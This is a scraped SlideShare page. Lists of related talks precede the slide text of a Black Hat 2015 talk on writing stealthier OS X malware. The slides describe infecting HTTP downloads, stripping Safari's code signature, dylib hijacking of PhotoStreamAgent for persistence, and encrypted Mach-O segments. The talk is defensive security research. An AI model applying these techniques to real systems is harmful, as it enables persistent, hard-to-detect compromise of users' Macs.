DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...Synack
 
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 
Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Xiao Yun
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернетаAy_sel
 
Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Sonu Jena
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Placeable
 

En vedette (20)

DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS X
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing Gatekeeper
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper Exposed
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
 
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinar
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
 
Structural insulated panels price
Structural insulated panels priceStructural insulated panels price
Structural insulated panels price
 
Osb eps osb structural insulated panels
Osb eps osb structural insulated panelsOsb eps osb structural insulated panels
Osb eps osb structural insulated panels
 
Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115
 
Mgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panelsMgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panels
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернета
 
Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02
 
me
meme
me
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior
 
Curriculo atualizado
Curriculo atualizadoCurriculo atualizado
Curriculo atualizado
 

Similaire à Black Hat '15: Writing Bad @$$ Malware for OS X

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-macCyphort
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsPriyanka Aash
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABIMikhail Sosonkin
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malwareYury Chemerkin
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea, Inc.
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 

Similaire à Black Hat '15: Writing Bad @$$ Malware for OS X (20)

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABI
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malware
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
Understand study
Understand studyUnderstand study
Understand study
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick Wardle
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 

Plus de Synack

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Synack
 
Electromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouElectromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouSynack
 
Home Automation Benchmarking Report
Home Automation Benchmarking ReportHome Automation Benchmarking Report
Home Automation Benchmarking ReportSynack
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a HouseSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 

Plus de Synack (7)

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
 
Electromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouElectromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and You
 
Home Automation Benchmarking Report
Home Automation Benchmarking ReportHome Automation Benchmarking Report
Home Automation Benchmarking Report
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a House
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation Vulnerabilities
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015
 

Dernier

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Dernier (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

Black Hat '15: Writing Bad @$$ Malware for OS X

  • 2. “leverages the best combination of humans and technology to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints” WHOIS @patrickwardle    
  • 3. this talk will cover… OUTLINE overview of os x malware bad @$$ malware defenses }bypassing pspspersistenceinfection self-defense features talk does not cover firmware or kernel-mode OS X malware (see: "Thunderstrike 2: Sith Strike")
  • 4. OVERVIEW OF OS X MALWARE the status quo
  • 5. macs are everywhere (home & enterprise) THE RISE OF MACS macs as % of total usa pc sales #3 usa / #5 worldwide vendor in pc shipments percentage 0 3.5 7 10.5 14 year '09 '10 '11 '12 '13 doesn’t  include  iDevices "Mac notebook sales have grown 21% over the last year, while total industry sales have fallen" -apple (3/2015)
  • 6. but macs don’t get malware…right? MALWARE ON OS X? ‘first’ virus (elk cloner) infected apple II’s last 5 years; ~50 new 
 os x malware families “It doesn’t get PC viruses. A Mac isn’t susceptible to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) "[2014] nearly 1000 unique attacks on Macs; 25 major families" -kasperksy
  • 7. __cstring:0000E910
 db  'clipboardd',0
 db  'com.apple.service.clipboardd.plist',0   db  '/Library/LaunchAgents',0     db  '<plist  version="1.0">',0Ah        '<key>RunAtLoad</key>',0Ah   provides reverse shell, keylogging, & screen capture OSX/XSLCMD “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com launch agent reverse shell keylogging screen capture OS X 10.9+ crashes
  • 8. ‘standard’ backdoor, providing survey, download/execute, etc. OSX/IWORM #  fs_usage  -­‐w  -­‐f  filesys   20:28:28.727871    open      /Library/LaunchDaemons/com.JavaW.plist                                               20:28:28.727890    write        B=0x16b                                                                                                         launch daemon survey download execute persisting infected torrents launch daemon plist
  • 9. an iOS infector (via USB) OSX/WIRELURKER } contacts texts launch daemons survey} infected app(s)
 'Maiyadi App Store' infects connected iPhones “a collection of scripts, plists, & binaries all duct-taped together... making it easy to detect.” -j zdziarski
  • 10. hackingteam's implant; collect all things! OSX/CRISIS (RCSMAC) launch agent rootkit component “There is nothing to be impressed from them from a technical point of view.” -@osxreverser persistence intelligence collection features
  • 11. the current state of OS X malware THE (KNOWN) STATUS QUO persistence psp bypassself-defense features ‣ well known techniques ‣ majority: launch items ‣ minimal obfuscation ‣ no active self-defense ‣ inelegantly implemented ‣ suffice for the job ‣ no psp awareness ‣ no counter-measures “current OS X malware, while sufficient, is inelegant, amateur, and trivial to detect & prevent”grade: C+ stealth ‣ 'hide' in plain site ‣ stand-alone executables infection ‣ trojans ‣ phishing/old exploits
  • 12. BAD @$$ OS X MALWARE current malware++
  • 13. current methods are rather lame INITIAL INFECTION VECTOR(S) fake codecs fake installers/updates infected torrents/apps }protects dumb users Gatekeeper blocking untrusted code somewhat effective, but smart users should be ok.
  • 14. a far better infection channel INFECTING SOFTWARE DOWNLOADS my dock MitM & infect non-SSL'd internet downloads HTTP :( still need to bypass GateKeeper... ;)
  • 15. these should be secure, right!? INFECTING AV SOFTWARE DOWNLOADS all the security software I could find, was downloaded over HTTP! LittleSnitch Sophos } ClamXav
  • 16. current methods are very lame PERSISTANCE launch items } login items persistence methods ‣ well known ‣ easily visible wirelurker's 4(!) launch daemons $  python  knockknock.py   com.apple.MailServiceAgentHelper   path:  /usr/bin/com.apple.MailServiceAgentHelper   com.apple.appstore.PluginHelper   path:  /usr/bin/com.apple.appstore.PluginHelper   periodicdate   path:  /usr/bin/periodicdate
 
 systemkeychain-­‐helper   path:  /usr/bin/systemkeychain-­‐helper MacProtector's login item
  • 17. fairly stealthy & difficult to disinfect BINARY INFECTION? Process:                  Safari  [1599]   Path:                        Safari.app/Contents/MacOS/Safari   Exception  Type:    EXC_CRASH  (Code  Signature  Invalid)   Exception  Codes:  0x0000000000000000,  0x0000000000000000 OS loader verifies all signatures :( killed by the loader
  • 18. the crypto seems solid, but what if it was gone? BINARY INFECTION? code signature :) #  md5  Safari.app/Contents/MacOS/Safari  -­‐>                633d043cf9742d6f0787acdee742c10d
 #  unsign.py  Safari.app/Contents/MacOS/Safari
    Safari  code  signature  removed
 
 #  md5  Safari.app/Contents/MacOS/Safari  -­‐>              825edd6a1e3aefa98d7cf99a60bac409
 
 $  open  /Applications/Safari.app  &&  ps  aux  |  grep  Safari      patrick    31337    /Applications/Safari.app  
  • 19. self-contained somewhat difficult to detect (now), lots of options! PERSISTENCE VIA BINARY INFECTION add new LC_LOAD_DYLIB? hijack entry point? } difficult to disinfect! google 'OS.X/Boubou'
  • 20. simply plant a dylib to win! DYLIB HIJACKING <blah>.dylib <blah>.dylib "I need <blah>.dylib" app dir "DLL Hijacking on OS X? #@%& Yeah!" DefCon (Sat, Aug 8th)
  • 21. via Apple's PhotoStreamAgent ('iCloudPhotos.app') DYLIB HIJACKING PERSISTENCE configure hijacker against PhotoFoundation (dylib) copy to /Applications/iPhoto.app/Contents/ Library/LoginItems/PhotoFoundation.framework/ Versions/A/PhotoFoundation $  reboot     $  lsof  -­‐p  <pid  of  PhotoStreamAgent>   /Applications/iPhoto.app/Contents/Library/LoginItems/PhotoFoundation.framework/Versions/A/PhotoFoundation   /Applications/iPhoto.app/Contents/Frameworks/PhotoFoundation.framework/Versions/A/PhotoFoundation PhotoStreamAgent novel no new processes no binary/OS modifications } abuses legitimate functionality of OS X OS X El Capitan still 'hijackable'
  • 22. currently, essentially non-existent SELF-DEFENSE 'hide' in plain sight } some crypto self-defense methods trivial to find trivial to analyze trivial to disinfect too easy for the AV companies!
  • 23. abusing OS X's natively supported encryption ENCRYPTED MACH-O BINARIES //load  &  decrypt  segments   load_segment(...){      //decrypt  encrypted  segments      if(scp-­‐>flags  &  SG_PROTECTED_VERSION_1)    unprotect_dsmos_segment(scp-­‐>fileoff,  scp-­‐>filesize,  vp,                                                  pager_offset,  map,  map_addr,  map_size);     }
 //decrypt  chunk   unprotect_dsmos_segment(...){
    //function  pointer  to  decryption  routine      crypt_info.page_decrypt  =  dsmos_page_transform;
    //decrypt
    vm_map_apple_protected(map,  map_addr,  map_addr  +  map_size,  
                                                &crypt_info);
